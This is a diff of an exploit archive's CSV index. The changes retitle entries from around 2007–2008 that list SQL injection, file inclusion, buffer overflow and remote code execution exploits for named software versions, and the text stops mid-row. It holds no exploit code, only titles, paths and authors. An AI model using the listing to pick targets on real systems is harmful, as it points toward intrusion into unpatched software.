4816,platforms/php/webapps/4816.txt,"SanyBee Gallery 0.1.1 - (p) Local File Inclusion",2007-12-30,jackal,php,webapps,0 -4817,platforms/php/webapps/4817.txt,"w-Agora <= 4.2.1 - (cat) Remote SQL Injection",2007-12-30,IHTeam,php,webapps,0 +4817,platforms/php/webapps/4817.txt,"w-Agora 4.2.1 - (cat) SQL Injection",2007-12-30,IHTeam,php,webapps,0 4818,platforms/windows/remote/4818.html,"IBM Domino Web Access Upload Module inotes6.dll BoF Exploit",2007-12-30,Elazar,windows,remote,0 4819,platforms/windows/remote/4819.html,"Macrovision Installshield isusweb.dll SEH Overwrite Exploit",2007-12-30,Elazar,windows,remote,0 4820,platforms/windows/remote/4820.html,"IBM Domino Web Access Upload Module dwa7w.dll BoF Exploit",2007-12-30,Elazar,windows,remote,0 -4821,platforms/php/webapps/4821.txt,"IPTBB <= 0.5.4 - (viewdir id) Remote SQL Injection",2007-12-31,MhZ91,php,webapps,0 -4822,platforms/php/webapps/4822.txt,"MyPHP Forum <= 3.0 - (Final) Multiple SQL Injection Vulnerabilities",2007-12-31,x0kster,php,webapps,0 -4823,platforms/php/webapps/4823.pl,"Zenphoto 1.1.3 - (rss.php albumnr) Remote SQL Injection Exploit",2007-12-31,Silentz,php,webapps,0 +4821,platforms/php/webapps/4821.txt,"IPTBB 0.5.4 - (viewdir id) SQL Injection",2007-12-31,MhZ91,php,webapps,0 +4822,platforms/php/webapps/4822.txt,"MyPHP Forum 3.0 - (Final) Multiple SQL Injection Vulnerabilities",2007-12-31,x0kster,php,webapps,0 +4823,platforms/php/webapps/4823.pl,"Zenphoto 1.1.3 - (rss.php albumnr) SQL Injection Exploit",2007-12-31,Silentz,php,webapps,0 4824,platforms/asp/webapps/4824.py,"oneSCHOOL - admin/login.asp SQL Injection Exploit",2007-12-31,Guga360,asp,webapps,0 4825,platforms/windows/remote/4825.html,"Vantage Linguistics AnswerWorks 4 API ActiveX Control BoF Exploit",2007-12-31,Elazar,windows,remote,0 -4826,platforms/php/webapps/4826.pl,"WebPortal CMS <= 0.6.0 - (index.php m) Remote SQL Injection Exploit",2007-12-31,x0kster,php,webapps,0 -4827,platforms/php/webapps/4827.txt,"Joomla Component PU Arcade <= 2.1.3 - SQL Injection",2007-12-31,Houssamix,php,webapps,0 +4826,platforms/php/webapps/4826.pl,"WebPortal CMS 0.6.0 - (index.php m) SQL Injection Exploit",2007-12-31,x0kster,php,webapps,0 +4827,platforms/php/webapps/4827.txt,"Joomla Component PU Arcade 2.1.3 - SQL Injection",2007-12-31,Houssamix,php,webapps,0 4828,platforms/php/webapps/4828.txt,"AGENCY4NET WEBFTP 1 download2.php File Disclosure",2008-01-01,GoLd_M,php,webapps,0 4829,platforms/windows/dos/4829.html,"DivX Player 6.6.0 - ActiveX SetPassword() Denial of Service PoC",2008-01-02,anonymous,windows,dos,0 -4830,platforms/php/webapps/4830.txt,"ClipShare (uprofile.php UID) Remote SQL Injection",2008-01-02,Krit,php,webapps,0 -4831,platforms/php/webapps/4831.txt,"MyPHP Forum <= 3.0 - (Final) Remote SQL Injection",2008-01-03,The:Paradox,php,webapps,0 -4832,platforms/php/webapps/4832.php,"Site@School <= 2.4.10 - Remote Blind SQL Injection Exploit",2008-01-03,EgiX,php,webapps,0 -4833,platforms/php/webapps/4833.txt,"NetRisk <= 1.9.7 - Remote/Local File Inclusion",2008-01-04,S.W.A.T.,php,webapps,0 +4830,platforms/php/webapps/4830.txt,"ClipShare (uprofile.php UID) SQL Injection",2008-01-02,Krit,php,webapps,0 +4831,platforms/php/webapps/4831.txt,"MyPHP Forum 3.0 - (Final) SQL Injection",2008-01-03,The:Paradox,php,webapps,0 +4832,platforms/php/webapps/4832.php,"Site@School 2.4.10 - Remote Blind SQL Injection Exploit",2008-01-03,EgiX,php,webapps,0 +4833,platforms/php/webapps/4833.txt,"NetRisk 1.9.7 - Remote/Local File Inclusion",2008-01-04,S.W.A.T.,php,webapps,0 4834,platforms/php/webapps/4834.txt,"samPHPweb (db.php commonpath) Remote File Inclusion",2008-01-04,Crackers_Child,php,webapps,0 4835,platforms/php/webapps/4835.py,"WebPortal CMS 0.6-beta Remote Password Change Exploit",2008-01-04,The:Paradox,php,webapps,0 -4836,platforms/php/webapps/4836.txt,"samPHPweb (songinfo.php) Remote SQL Injection",2008-01-05,BackDoor,php,webapps,0 +4836,platforms/php/webapps/4836.txt,"samPHPweb (songinfo.php) SQL Injection",2008-01-05,BackDoor,php,webapps,0 4837,platforms/php/webapps/4837.pl,"ClipShare 2.6 - Remote User Password Change Exploit",2008-01-05,Pr0metheuS,php,webapps,0 4838,platforms/php/webapps/4838.txt,"snetworks php classifieds 5.0 - Remote File Inclusion",2008-01-05,Crackers_Child,php,webapps,0 4839,platforms/windows/local/4839.pl,"CoolPlayer 2.17 - (.m3u) Stack Overflow Exploit",2008-01-05,Trancek,windows,local,0 -4840,platforms/php/webapps/4840.php,"Tribisur <= 2.0 - Remote SQL Injection Exploit",2008-01-05,x0kster,php,webapps,0 -4841,platforms/php/webapps/4841.txt,"Invision Power Board <= 2.1.7 - ACTIVE XSS/SQL Injection Exploit",2008-01-05,"Eugene Minaev",php,webapps,0 +4840,platforms/php/webapps/4840.php,"Tribisur 2.0 - SQL Injection Exploit",2008-01-05,x0kster,php,webapps,0 +4841,platforms/php/webapps/4841.txt,"Invision Power Board 2.1.7 - ACTIVE XSS/SQL Injection Exploit",2008-01-05,"Eugene Minaev",php,webapps,0 4842,platforms/php/webapps/4842.pl,"NetRisk 1.9.7 - (change_submit.php) Remote Password Change Exploit",2008-01-05,Cod3rZ,php,webapps,0 4843,platforms/php/webapps/4843.txt,"modx CMS 0.9.6.1 - Multiple Vulnerabilities",2008-01-05,BugReport.IR,php,webapps,0 4844,platforms/php/webapps/4844.txt,"WordPress Plugin Wp-FileManager 1.2 - Remote Upload",2008-01-06,Houssamix,php,webapps,0 -4845,platforms/php/webapps/4845.pl,"RunCMS Newbb_plus <= 0.92 Client IP Remote SQL Injection Exploit",2008-01-06,"Eugene Minaev",php,webapps,0 +4845,platforms/php/webapps/4845.pl,"RunCMS Newbb_plus 0.92 Client IP SQL Injection Exploit",2008-01-06,"Eugene Minaev",php,webapps,0 4846,platforms/php/webapps/4846.txt,"Uebimiau Web-Mail 2.7.10/2.7.2 - Remote File Disclosure",2008-01-06,"Eugene Minaev",php,webapps,0 -4847,platforms/php/webapps/4847.txt,"XOOPS mod_gallery Zend_Hash_key + Extract - RFI",2008-01-06,"Eugene Minaev",php,webapps,0 +4847,platforms/php/webapps/4847.txt,"XOOPS mod_gallery Zend_Hash_key + Extract - Remote File Inclusion",2008-01-06,"Eugene Minaev",php,webapps,0 4848,platforms/asp/webapps/4848.txt,"portalapp 4.0 - (SQL/XSS/auth bypasses) Multiple Vulnerabilities",2008-01-06,r3dm0v3,asp,webapps,0 -4849,platforms/php/webapps/4849.txt,"LoudBlog <= 0.6.1 - (parsedpage) Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0 +4849,platforms/php/webapps/4849.txt,"LoudBlog 0.6.1 - (parsedpage) Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0 4850,platforms/php/webapps/4850.txt,"Horde Web-Mail 3.x - (go.php) Remote File Disclosure",2008-01-06,"Eugene Minaev",php,webapps,0 4851,platforms/php/webapps/4851.txt,"CuteNews 1.1.1 - (html.php) Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0 4852,platforms/php/webapps/4852.txt,"netrisk 1.9.7 - (XSS/SQL) Multiple Vulnerabilities",2008-01-06,"Virangar Security",php,webapps,0 -4853,platforms/php/webapps/4853.php,"DCP-Portal <= 6.11 - Remote SQL Injection Exploit",2008-01-06,x0kster,php,webapps,0 -4854,platforms/php/webapps/4854.txt,"SineCMS <= 2.3.5 - Local File Inclusion / RCE Vulnerabilities",2008-01-06,KiNgOfThEwOrLd,php,webapps,0 +4853,platforms/php/webapps/4853.php,"DCP-Portal 6.11 - SQL Injection Exploit",2008-01-06,x0kster,php,webapps,0 +4854,platforms/php/webapps/4854.txt,"SineCMS 2.3.5 - Local File Inclusion / RCE Vulnerabilities",2008-01-06,KiNgOfThEwOrLd,php,webapps,0 4855,platforms/php/webapps/4855.txt,"Shop-Script 2.0 index.php Remote File Disclosure",2008-01-06,Fisher762,php,webapps,0 4856,platforms/multiple/dos/4856.php,"Half-Life CSTRIKE Server 1.6 - Denial of Service Exploit (no-steam)",2008-01-06,"Eugene Minaev",multiple,dos,0 -4857,platforms/php/webapps/4857.txt,"OneCMS 2.4 - Remote SQL Injection / Upload Vulnerabilities",2008-01-07,BugReport.IR,php,webapps,0 -4858,platforms/php/webapps/4858.pl,"FlexBB <= 0.6.3 Cookies Remote SQL Injection Exploit",2008-01-07,"Eugene Minaev",php,webapps,0 -4859,platforms/php/webapps/4859.txt,"EkinBoard <= 1.1.0 - Remote File Upload / Auth Bypass Vulnerabilities",2008-01-07,"Eugene Minaev",php,webapps,0 -4860,platforms/php/webapps/4860.pl,"Eggblog <= 3.1.0 Cookies Remote SQL Injection Exploit",2008-01-07,"Eugene Minaev",php,webapps,0 +4857,platforms/php/webapps/4857.txt,"OneCMS 2.4 - SQL Injection / Upload Vulnerabilities",2008-01-07,BugReport.IR,php,webapps,0 +4858,platforms/php/webapps/4858.pl,"FlexBB 0.6.3 Cookies SQL Injection Exploit",2008-01-07,"Eugene Minaev",php,webapps,0 +4859,platforms/php/webapps/4859.txt,"EkinBoard 1.1.0 - Remote File Upload / Auth Bypass Vulnerabilities",2008-01-07,"Eugene Minaev",php,webapps,0 +4860,platforms/php/webapps/4860.pl,"Eggblog 3.1.0 Cookies SQL Injection Exploit",2008-01-07,"Eugene Minaev",php,webapps,0 4861,platforms/php/webapps/4861.txt,"TUTOS 1.3 - (cmd.php) Remote Command Execution",2008-01-07,Houssamix,php,webapps,0 4862,platforms/linux/remote/4862.py,"ClamAV 0.91.2 libclamav MEW PE Buffer Overflow Exploit",2008-01-07,"Thomas Pollet",linux,remote,0 -4863,platforms/php/webapps/4863.pl,"SmallNuke 2.0.4 Pass Recovery Remote SQL Injection Exploit",2008-01-08,"Eugene Minaev",php,webapps,0 +4863,platforms/php/webapps/4863.pl,"SmallNuke 2.0.4 Pass Recovery SQL Injection Exploit",2008-01-08,"Eugene Minaev",php,webapps,0 4864,platforms/php/webapps/4864.txt,"Zero CMS 1.0 - Alpha Arbitrary File Upload / SQL Injection Vulnerabilities",2008-01-08,KiNgOfThEwOrLd,php,webapps,0 4865,platforms/php/webapps/4865.txt,"evilboard 0.1a - (SQL/XSS) Multiple Vulnerabilities",2008-01-08,seaofglass,php,webapps,0 4866,platforms/windows/remote/4866.py,"Microsoft DirectX SAMI File Parsing - Remote Stack Overflow Exploit",2008-01-08,ryujin,windows,remote,0 -4867,platforms/php/webapps/4867.pl,"PHP Webquest 2.6 - (id_actividad) Remote SQL Injection Exploit",2008-01-08,ka0x,php,webapps,0 +4867,platforms/php/webapps/4867.pl,"PHP Webquest 2.6 - (id_actividad) SQL Injection Exploit",2008-01-08,ka0x,php,webapps,0 4868,platforms/windows/remote/4868.html,"Move Networks Quantum Streaming Player - SEH Overwrite Exploit",2008-01-08,Elazar,windows,remote,0 4869,platforms/windows/remote/4869.html,"Gateway Weblaunch ActiveX Control Insecure Method Exploit",2008-01-08,Elazar,windows,remote,0 -4870,platforms/php/webapps/4870.txt,"osData <= 2.08 Modules Php121 - Local File Inclusion",2008-01-09,"Cold Zero",php,webapps,0 +4870,platforms/php/webapps/4870.txt,"osData 2.08 Modules Php121 - Local File Inclusion",2008-01-09,"Cold Zero",php,webapps,0 4871,platforms/php/webapps/4871.php,"UploadImage/UploadScript 1.0 - Remote Change Admin Password Exploit",2008-01-09,Dj7xpl,php,webapps,0 4872,platforms/php/webapps/4872.txt,"PHP Webquest 2.6 Get Database Credentials",2008-01-09,MhZ91,php,webapps,0 4873,platforms/windows/remote/4873.html,"Microsoft FoxServer (vfp6r.dll 6.0.8862.0) ActiveX Command Execution",2008-01-09,shinnai,windows,remote,0 4874,platforms/windows/remote/4874.html,"Microsoft Rich Textbox Control 6.0 - (SP6) SaveFile() Insecure Method",2008-01-09,shinnai,windows,remote,0 4876,platforms/php/webapps/4876.txt,"Tuned Studios Templates Local File Inclusion",2008-01-09,DSecRG,php,webapps,0 -4877,platforms/multiple/remote/4877.txt,"SAP MaxDB <= 7.6.03.07 - pre-auth Remote Command Execution Exploit",2008-01-09,"Luigi Auriemma",multiple,remote,7210 +4877,platforms/multiple/remote/4877.txt,"SAP MaxDB 7.6.03.07 - pre-auth Remote Command Execution Exploit",2008-01-09,"Luigi Auriemma",multiple,remote,7210 4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server - Remote pre-auth Code Execution / DoS PoC",2008-01-09,"Leon Juranic",multiple,dos,0 -4879,platforms/php/webapps/4879.php,"Docebo <= 3.5.0.3 - (lib.regset.php) Command Execution Exploit",2008-01-09,EgiX,php,webapps,0 -4880,platforms/php/webapps/4880.php,"DomPHP <= 0.81 - Remote Add Administrator Exploit",2008-01-10,j0j0,php,webapps,0 +4879,platforms/php/webapps/4879.php,"Docebo 3.5.0.3 - (lib.regset.php) Command Execution Exploit",2008-01-09,EgiX,php,webapps,0 +4880,platforms/php/webapps/4880.php,"DomPHP 0.81 - Remote Add Administrator Exploit",2008-01-10,j0j0,php,webapps,0 4881,platforms/solaris/dos/4881.c,"SunOS 5.10 - Remote ICMP Kernel Crash Exploit",2008-01-10,kingcope,solaris,dos,0 -4882,platforms/php/webapps/4882.txt,"MTCMS <= 2.0 - Remote SQL Injection Vulnerabilities",2008-01-10,"Virangar Security",php,webapps,0 +4882,platforms/php/webapps/4882.txt,"MTCMS 2.0 - SQL Injection Vulnerabilities",2008-01-10,"Virangar Security",php,webapps,0 4883,platforms/php/webapps/4883.txt,"DomPHP 0.81 - (index.php page) Remote File Inclusion",2008-01-10,Houssamix,php,webapps,0 -4884,platforms/php/webapps/4884.php,"Evilsentinel <= 1.0.9 - (Multiple Vulnerabilities) Disable Exploit",2008-01-10,BlackHawk,php,webapps,0 -4885,platforms/windows/dos/4885.txt,"Quicktime Player <= 7.3.1.70 - (rtsp) Buffer Overflow",2008-01-10,"Luigi Auriemma",windows,dos,0 -4886,platforms/php/webapps/4886.pl,"iGaming CMS <= 1.3.1/1.5 - Remote SQL Injection Exploit",2008-01-11,"Eugene Minaev",php,webapps,0 -4887,platforms/php/webapps/4887.htm,"DigitalHive <= 2.0 RC2 - (user_id) Remote SQL Injection Exploit",2008-01-11,j0j0,php,webapps,0 -4888,platforms/php/webapps/4888.txt,"DomPHP 0.81 - (index.php cat) Remote SQL Injection",2008-01-11,MhZ91,php,webapps,0 +4884,platforms/php/webapps/4884.php,"Evilsentinel 1.0.9 - (Multiple Vulnerabilities) Disable Exploit",2008-01-10,BlackHawk,php,webapps,0 +4885,platforms/windows/dos/4885.txt,"Quicktime Player 7.3.1.70 - (rtsp) Buffer Overflow",2008-01-10,"Luigi Auriemma",windows,dos,0 +4886,platforms/php/webapps/4886.pl,"iGaming CMS 1.3.1/1.5 - SQL Injection Exploit",2008-01-11,"Eugene Minaev",php,webapps,0 +4887,platforms/php/webapps/4887.htm,"DigitalHive 2.0 RC2 - (user_id) SQL Injection Exploit",2008-01-11,j0j0,php,webapps,0 +4888,platforms/php/webapps/4888.txt,"DomPHP 0.81 - (index.php cat) SQL Injection",2008-01-11,MhZ91,php,webapps,0 4889,platforms/php/webapps/4889.txt,"vcart 3.3.2 - Multiple Remote File Inclusion Vulnerabilities",2008-01-11,k1n9k0ng,php,webapps,0 -4890,platforms/php/webapps/4890.txt,"AJchat 0.10 unset() bug Remote SQL Injection",2008-01-11,"Eugene Minaev",php,webapps,0 -4891,platforms/php/webapps/4891.php,"Docebo <= 3.5.0.3 - (lib.regset.php/non-blind) SQL Injection Exploit",2008-01-11,rgod,php,webapps,0 +4890,platforms/php/webapps/4890.txt,"AJchat 0.10 unset() bug SQL Injection",2008-01-11,"Eugene Minaev",php,webapps,0 +4891,platforms/php/webapps/4891.php,"Docebo 3.5.0.3 - (lib.regset.php/non-blind) SQL Injection Exploit",2008-01-11,rgod,php,webapps,0 4892,platforms/windows/local/4892.py,"Microsoft Visual InterDev 6.0 - (SP6) .sln File Local Buffer Overflow Exploit",2008-01-11,shinnai,windows,local,0 -4893,platforms/linux/dos/4893.c,"Linux Kernel <= 2.6.21.1 - IPv6 Jumbo Bug Remote DoS Exploit",2008-01-11,"Clemens Kurtenbach",linux,dos,0 +4893,platforms/linux/dos/4893.c,"Linux Kernel 2.6.21.1 - IPv6 Jumbo Bug Remote DoS Exploit",2008-01-11,"Clemens Kurtenbach",linux,dos,0 4894,platforms/windows/remote/4894.html,"StreamAudio ChainCast ProxyManager ccpm_0237.dll BoF Exploit",2008-01-11,Elazar,windows,remote,0 -4895,platforms/php/webapps/4895.txt,"ImageAlbum 2.0.0b2 - (id) Remote SQL Injection",2008-01-11,"Raw Security",php,webapps,0 +4895,platforms/php/webapps/4895.txt,"ImageAlbum 2.0.0b2 - (id) SQL Injection",2008-01-11,"Raw Security",php,webapps,0 4896,platforms/php/webapps/4896.pl,"0DayDB 2.3 - (delete id) Remote Admin Bypass Exploit",2008-01-11,Pr0metheuS,php,webapps,0 -4897,platforms/php/webapps/4897.pl,"photokron <= 1.7 - (update script) Remote Database Disclosure Exploit",2008-01-11,Pr0metheuS,php,webapps,0 +4897,platforms/php/webapps/4897.pl,"photokron 1.7 - (update script) Remote Database Disclosure Exploit",2008-01-11,Pr0metheuS,php,webapps,0 4898,platforms/php/webapps/4898.txt,"Agares PhpAutoVideo 2.21 - (articlecat) SQL Injection",2008-01-12,ka0x,php,webapps,0 -4899,platforms/php/webapps/4899.txt,"TaskFreak! <= 0.6.1 - Remote SQL Injection",2008-01-12,TheDefaced,php,webapps,0 +4899,platforms/php/webapps/4899.txt,"TaskFreak! <= 0.6.1 - SQL Injection",2008-01-12,TheDefaced,php,webapps,0 4900,platforms/asp/webapps/4900.txt,"ASP Photo Gallery 1.0 - Multiple SQL Injection Vulnerabilities",2008-01-12,trew,asp,webapps,0 -4901,platforms/php/webapps/4901.txt,"TutorialCMS 1.02 - (userName) Remote SQL Injection",2008-01-12,ka0x,php,webapps,0 +4901,platforms/php/webapps/4901.txt,"TutorialCMS 1.02 - (userName) SQL Injection",2008-01-12,ka0x,php,webapps,0 4902,platforms/php/webapps/4902.txt,"minimal Gallery 0.8 - Remote File Disclosure",2008-01-13,Houssamix,php,webapps,0 4903,platforms/windows/remote/4903.html,"NUVICO DVR NVDV4 / PdvrAtl Module (PdvrAtl.DLL 1.0.1.25) - BoF Exploit",2008-01-13,rgod,windows,remote,0 4904,platforms/php/webapps/4904.txt,"Binn SBuilder (nid) Remote Blind SQL Injection",2008-01-13,JosS,php,webapps,0 -4905,platforms/php/webapps/4905.pl,"Agares PhpAutoVideo 2.21 - (articlecat) Remote SQL Injection Exploit",2008-01-13,Pr0metheuS,php,webapps,0 +4905,platforms/php/webapps/4905.pl,"Agares PhpAutoVideo 2.21 - (articlecat) SQL Injection Exploit",2008-01-13,Pr0metheuS,php,webapps,0 4906,platforms/windows/remote/4906.txt,"Quicktime Player 7.3.1.70 - rtsp Remote Buffer Overflow Exploit PoC",2008-01-14,"Luigi Auriemma",windows,remote,0 -4907,platforms/php/webapps/4907.py,"X7 Chat <= 2.0.5 - (day) Remote SQL Injection Exploit",2008-01-14,nonroot,php,webapps,0 -4908,platforms/php/webapps/4908.pl,"Xforum 1.4 - (topic) Remote SQL Injection Exploit",2008-01-14,j0j0,php,webapps,0 +4907,platforms/php/webapps/4907.py,"X7 Chat 2.0.5 - (day) SQL Injection Exploit",2008-01-14,nonroot,php,webapps,0 +4908,platforms/php/webapps/4908.pl,"Xforum 1.4 - (topic) SQL Injection Exploit",2008-01-14,j0j0,php,webapps,0 4909,platforms/windows/remote/4909.html,"Macrovision FlexNet DownloadManager Insecure Methods Exploit",2008-01-14,Elazar,windows,remote,0 -4910,platforms/asp/webapps/4910.pl,"RichStrong CMS (showproduct.asp cat) Remote SQL Injection Exploit",2008-01-14,JosS,asp,webapps,0 +4910,platforms/asp/webapps/4910.pl,"RichStrong CMS (showproduct.asp cat) SQL Injection Exploit",2008-01-14,JosS,asp,webapps,0 4911,platforms/windows/dos/4911.c,"Cisco VPN Client - IPSec Driver Local kernel system pool Corruption PoC",2008-01-15,mu-b,windows,dos,0 4912,platforms/php/webapps/4912.txt,"LulieBlog 1.0.1 - (delete id) Remote Admin Bypass",2008-01-15,ka0x,php,webapps,0 4913,platforms/windows/remote/4913.html,"Macrovision FlexNet isusweb.dll DownloadAndExecute Method Exploit",2008-01-15,Elazar,windows,remote,0 -4914,platforms/php/webapps/4914.txt,"FaScript FaMp3 1.0 - (show.php) Remote SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps,0 -4915,platforms/php/webapps/4915.txt,"FaScript FaName 1.0 - (page.php) Remote SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps,0 +4914,platforms/php/webapps/4914.txt,"FaScript FaMp3 1.0 - (show.php) SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps,0 +4915,platforms/php/webapps/4915.txt,"FaScript FaName 1.0 - (page.php) SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps,0 4916,platforms/php/webapps/4916.txt,"FaScript FaPersian Petition (show.php) SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps,0 4917,platforms/php/webapps/4917.txt,"FaScript FaPersianHack 1.0 - (show.php) SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps,0 4918,platforms/windows/remote/4918.html,"RTS Sentry Digital Surveillance (CamPanel.dll 2.1.0.2) BoF Exploit",2008-01-16,rgod,windows,remote,0 @@ -4566,21 +4566,21 @@ id,file,description,date,author,platform,type,port 4922,platforms/php/webapps/4922.txt,"alitalk 1.9.1.1 - Multiple Vulnerabilities",2008-01-16,tomplixsee,php,webapps,0 4923,platforms/windows/remote/4923.txt,"miniweb 0.8.19 - Multiple Vulnerabilities",2008-01-16,"Hamid Ebadi",windows,remote,0 4924,platforms/php/webapps/4924.php,"PixelPost 1.7 - Remote Blind SQL Injection Exploit",2008-01-16,Silentz,php,webapps,0 -4925,platforms/php/webapps/4925.txt,"PHP-RESIDENCE 0.7.2 - (Search) Remote SQL Injection",2008-01-16,"Khashayar Fereidani",php,webapps,0 -4926,platforms/php/webapps/4926.pl,"Gradman <= 0.1.3 - (agregar_info.php) Local File Inclusion Exploit",2008-01-16,JosS,php,webapps,0 +4925,platforms/php/webapps/4925.txt,"PHP-RESIDENCE 0.7.2 - (Search) SQL Injection",2008-01-16,"Khashayar Fereidani",php,webapps,0 +4926,platforms/php/webapps/4926.pl,"Gradman 0.1.3 - (agregar_info.php) Local File Inclusion Exploit",2008-01-16,JosS,php,webapps,0 4927,platforms/php/webapps/4927.php,"MyBulletinBoard (MyBB) <= 1.2.10 - Remote Code Execution Exploit",2008-01-16,Silentz,php,webapps,0 4928,platforms/php/webapps/4928.txt,"mybulletinboard (mybb) <= 1.2.10 - Multiple Vulnerabilities",2008-01-16,waraxe,php,webapps,0 -4929,platforms/php/webapps/4929.txt,"PHPEcho CMS 2.0 - (id) Remote SQL Injection",2008-01-17,Stack,php,webapps,0 +4929,platforms/php/webapps/4929.txt,"PHPEcho CMS 2.0 - (id) SQL Injection",2008-01-17,Stack,php,webapps,0 4930,platforms/php/webapps/4930.txt,"Mini File Host 1.2 - (upload.php language) LFI",2008-01-17,Scary-Boys,php,webapps,0 4931,platforms/windows/dos/4931.txt,"Crystal Reports XI Release 2 - (Enterprise Tree Control) ActiveX BOF/DoS",2008-01-17,shinnai,windows,dos,0 4932,platforms/windows/remote/4932.html,"Digital Data Communications (RtspVaPgCtrl) Remote BoF Exploit",2008-01-17,rgod,windows,remote,0 4933,platforms/php/webapps/4933.pl,"AuraCMS 1.62 - (stat.php) Remote Code Execution Exploit",2008-01-18,k1tk4t,php,webapps,0 4934,platforms/windows/remote/4934.c,"Microsoft Windows Message Queuing Service RPC BoF Exploit (dnsname)",2008-01-18,"Marcin Kozlowski",windows,remote,0 4935,platforms/bsd/dos/4935.c,"OpenBSD 4.2 rtlabel_id2name() Local Null Pointer Dereference DoS",2008-01-18,Hunger,bsd,dos,0 -4936,platforms/php/webapps/4936.txt,"Gradman <= 0.1.3 - (info.php tabla) Local File Inclusion",2008-01-18,Syndr0me,php,webapps,0 +4936,platforms/php/webapps/4936.txt,"Gradman 0.1.3 - (info.php tabla) Local File Inclusion",2008-01-18,Syndr0me,php,webapps,0 4937,platforms/php/webapps/4937.txt,"Small Axe 0.3.1 - (linkbar.php cfile) Remote File Inclusion",2008-01-18,RoMaNcYxHaCkEr,php,webapps,0 4938,platforms/windows/local/4938.py,"Microsoft Visual Basic Enterprise Ed. 6 SP6 - (.dsr) File Handling BoF Exploit",2008-01-18,shinnai,windows,local,0 -4939,platforms/php/webapps/4939.txt,"WordPress Plugin WP-Forum 1.7.4 - Remote SQL Injection",2008-01-19,"websec Team",php,webapps,0 +4939,platforms/php/webapps/4939.txt,"WordPress Plugin WP-Forum 1.7.4 - SQL Injection",2008-01-19,"websec Team",php,webapps,0 4940,platforms/php/webapps/4940.pl,"Mini File Host 1.2.1 - (upload.php language) Local File Inclusion Exploit",2008-01-20,shinmai,php,webapps,0 4941,platforms/hardware/remote/4941.txt,"Belkin Wireless G Plus MIMO Router F5D9230-4 - Auth Bypass",2008-01-20,DarkFig,hardware,remote,0 4942,platforms/php/webapps/4942.txt,"TikiWiki < 1.9.9 tiki-listmovies.php Directory Traversal",2008-01-20,Sha0,php,webapps,0 @@ -4588,12 +4588,12 @@ id,file,description,date,author,platform,type,port 4944,platforms/php/webapps/4944.txt,"360 Web Manager 3.0 - (IDFM) SQL Injection",2008-01-20,"Ded MustD!e",php,webapps,0 4945,platforms/php/webapps/4945.txt,"bloofox 0.3 - (SQL/fd) Multiple Vulnerabilities",2008-01-20,BugReport.IR,php,webapps,0 4946,platforms/windows/remote/4946.html,"Toshiba Surveillance (MeIpCamX.DLL 1.0.0.4) Remote BoF Exploit",2008-01-20,rgod,windows,remote,0 -4947,platforms/linux/remote/4947.c,"Axigen <= 5.0.2 AXIMilter Remote Format String Exploit",2008-01-21,hempel,linux,remote,0 -4948,platforms/windows/remote/4948.txt,"Windows RSH daemon <= 1.8 - Remote Buffer Overflow Exploit",2008-01-21,prdelka,windows,remote,0 -4949,platforms/windows/remote/4949.txt,"Citadel SMTP <= 7.10 - Remote Overflow Exploit",2008-01-21,prdelka,windows,remote,25 -4950,platforms/php/webapps/4950.php,"Coppermine Photo Gallery 1.4.10 - Remote SQL Injection Exploit",2008-01-21,bazik,php,webapps,0 +4947,platforms/linux/remote/4947.c,"Axigen 5.0.2 AXIMilter Remote Format String Exploit",2008-01-21,hempel,linux,remote,0 +4948,platforms/windows/remote/4948.txt,"Windows RSH daemon 1.8 - Remote Buffer Overflow Exploit",2008-01-21,prdelka,windows,remote,0 +4949,platforms/windows/remote/4949.txt,"Citadel SMTP 7.10 - Remote Overflow Exploit",2008-01-21,prdelka,windows,remote,25 +4950,platforms/php/webapps/4950.php,"Coppermine Photo Gallery 1.4.10 - SQL Injection Exploit",2008-01-21,bazik,php,webapps,0 4951,platforms/php/webapps/4951.txt,"Mooseguy Blog System 1.0 - (blog.php month) SQL Injection",2008-01-21,The_HuliGun,php,webapps,0 -4952,platforms/php/webapps/4952.txt,"boastMachine <= 3.1 - (mail.php id) SQL Injection",2008-01-21,"Virangar Security",php,webapps,0 +4952,platforms/php/webapps/4952.txt,"boastMachine 3.1 - (mail.php id) SQL Injection",2008-01-21,"Virangar Security",php,webapps,0 4953,platforms/php/webapps/4953.txt,"OZJournals 2.1.1 - (id) File Disclosure",2008-01-21,shinmai,php,webapps,0 4954,platforms/php/webapps/4954.txt,"IDM-OS 1.0 - (download.php fileName) File Disclosure",2008-01-21,MhZ91,php,webapps,0 4955,platforms/php/webapps/4955.txt,"Lama Software 14.12.2007 - Multiple Remote File Inclusion Vulnerabilities",2008-01-21,QTRinux,php,webapps,0 @@ -4601,17 +4601,17 @@ id,file,description,date,author,platform,type,port 4957,platforms/php/webapps/4957.txt,"MoinMoin 1.5.x MOIND_ID cookie Bug Remote Exploit",2008-01-21,nonroot,php,webapps,0 4958,platforms/php/webapps/4958.txt,"aflog 1.01 comments.php XSS / SQL Injection",2008-01-22,shinmai,php,webapps,0 4959,platforms/windows/remote/4959.html,"HP Virtual Rooms WebHPVCInstall Control Buffer Overflow Exploit",2008-01-22,Elazar,windows,remote,0 -4960,platforms/php/webapps/4960.txt,"Easysitenetwork Recipe (categoryid) Remote SQL Injection",2008-01-22,S@BUN,php,webapps,0 -4961,platforms/php/webapps/4961.php,"Coppermine Photo Gallery <= 1.4.14 - Remote SQL Injection Exploit",2008-01-22,RST/GHC,php,webapps,0 +4960,platforms/php/webapps/4960.txt,"Easysitenetwork Recipe (categoryid) SQL Injection",2008-01-22,S@BUN,php,webapps,0 +4961,platforms/php/webapps/4961.php,"Coppermine Photo Gallery 1.4.14 - SQL Injection Exploit",2008-01-22,RST/GHC,php,webapps,0 4962,platforms/php/webapps/4962.pl,"SetCMS 3.6.5 - (setcms.org) Remote Command Execution Exploit",2008-01-22,RST/GHC,php,webapps,0 -4963,platforms/php/webapps/4963.pl,"YaBB SE <= 1.5.5 - Remote Command Execution Exploit",2008-01-22,RST/GHC,php,webapps,0 -4964,platforms/php/webapps/4964.php,"PHP-Nuke < 8.0 - (sid) Remote SQL Injection Exploit",2008-01-22,RST/GHC,php,webapps,0 -4965,platforms/php/webapps/4965.php,"PHP-Nuke <= 8.0 Final (sid) Remote 